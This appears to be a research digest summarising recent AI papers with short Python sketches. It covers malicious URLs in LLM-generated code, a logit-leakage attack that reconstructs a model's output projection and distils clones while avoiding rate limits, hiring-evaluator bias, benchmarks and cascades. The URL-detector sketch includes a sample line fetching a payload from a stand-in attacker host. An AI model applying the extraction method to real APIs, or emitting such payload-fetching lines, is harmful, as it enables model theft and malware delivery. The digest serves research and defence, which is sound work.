Overview
- A scalable audit of GPT-4o, GPT-4o-mini, Llama-4-Scout, and DeepSeek-V3 found that an average of 4.2% of generated programs contained malicious URLs, with 177 benign prompts reliably triggering harmful code across all models (see the URL-audit sketch after this list).
- A logit-leakage attack reconstructed a model's output projection from fewer than 10,000 top-k queries and distilled functional clones in under 24 GPU hours, all without tripping API rate limits (a toy recovery sketch follows below).
- A large controlled hiring study found strong self-preferencing: LLM evaluators favored resumes written by the same model, boosting shortlisting odds by 23%–60% over equally qualified human-written resumes, while simple interventions roughly halved the bias (the odds-ratio arithmetic is worked below).
- New evaluation resources span deep research synthesis (InfoSeek), verifier‑reward reasoning datasets and generators (LoongBench/LoongEnv), Arabic and Islamic cultural competence (PalmX), Korean legal multi‑hop QA (KoBLEX), and rubric‑driven clinical behavior assessment (HealthBench).
- Mitigation and efficiency tools reported concrete gains, including constitution-aware decoding that reduced Indian caste- and religion-based bias by up to 26.41% (AMBEDKAR), a cost-guaranteed model cascade that cut spend by up to 86% (BARGAIN), and an attribution method that audits RAG reliance with over 95% accuracy (LEA); a minimal cascade sketch closes this section.
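
To make the malicious-URL finding concrete, here is a minimal sketch of the kind of check such an audit implies: extract URLs from generated code and match their hosts against a reputation blocklist. The regex, helper name, and blocklist entries are illustrative assumptions, not the paper's actual pipeline.

```python
import re

# Illustrative blocklist; the audit's actual URL-reputation sources are not named here.
BLOCKLIST = {"evil.example.com", "malware.example.net"}

URL_RE = re.compile(r"https?://([^/\s'\"<>]+)")

def flag_malicious_urls(generated_code: str) -> list[str]:
    """Return any blocklisted hosts found in a generated program."""
    hosts = {m.group(1).lower() for m in URL_RE.finditer(generated_code)}
    return sorted(h for h in hosts if h in BLOCKLIST)

sample = 'urllib.request.urlopen("http://evil.example.com/payload")'
print(flag_malicious_urls(sample))  # ['evil.example.com']
```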
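The logit-leakage result rests on a simple linear-algebra fact: every full logit vector is a hidden state times the output projection, so logits collected across many prompts span only a hidden-size-dimensional subspace, and an SVD recovers that projection up to an invertible transform. Below is a toy numpy sketch of that idea; it assumes full logit vectors can already be reassembled from top-k responses and stands in for, rather than reproduces, the paper's query and distillation procedure.

```python
import numpy as np

rng = np.random.default_rng(0)
V, h, n_queries = 1000, 64, 200          # vocab size, hidden size, prompts queried
W = rng.normal(size=(V, h))              # the victim's secret output projection

def query_logits(_prompt_id: int) -> np.ndarray:
    """Stand-in for reassembling one full logit vector from top-k API responses."""
    hidden = rng.normal(size=h)          # final hidden state for this prompt
    return W @ hidden

# Logit vectors across prompts all lie in the h-dimensional column space of W.
L = np.stack([query_logits(i) for i in range(n_queries)], axis=1)   # (V, n_queries)
U, S, _ = np.linalg.svd(L, full_matrices=False)
rank = int((S > 1e-6 * S[0]).sum())
print("recovered hidden size:", rank)    # 64
W_hat = U[:, :rank]                      # spans W's columns: W up to a linear transform
```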
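For the hiring result, note that the 23%–60% figures are boosts in odds, not in the shortlisting rate itself. A quick worked example with made-up rates (not the study's numbers) shows the arithmetic:

```python
def odds(p: float) -> float:
    """Convert a shortlisting probability into odds."""
    return p / (1 - p)

# Hypothetical rates chosen only to illustrate the arithmetic.
p_human, p_same_model = 0.40, 0.45
ratio = odds(p_same_model) / odds(p_human)
print(f"odds ratio: {ratio:.2f}")  # 1.23, i.e. a 23% boost in shortlisting odds
```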
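Finally, the cascade savings come from answering most queries with a cheap model and escalating only when needed. The sketch below uses a fixed confidence threshold as a stand-in for BARGAIN's statistical cost/quality guarantees; the `Model` class, threshold, and stub models are assumptions for illustration.

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class Model:
    name: str
    cost_per_call: float
    run: Callable[[str], tuple[str, float]]   # prompt -> (answer, confidence)

def cascade(prompt: str, tiers: list[Model], threshold: float = 0.9):
    """Try cheap models first; escalate while confidence stays below threshold."""
    spent = 0.0
    for tier in tiers:
        answer, conf = tier.run(prompt)
        spent += tier.cost_per_call
        if conf >= threshold or tier is tiers[-1]:
            return answer, tier.name, spent

cheap = Model("small", 0.001, lambda p: ("draft answer", 0.95 if len(p) < 80 else 0.5))
large = Model("large", 0.020, lambda p: ("careful answer", 0.99))
print(cascade("short prompt", [cheap, large]))  # ('draft answer', 'small', 0.001)
```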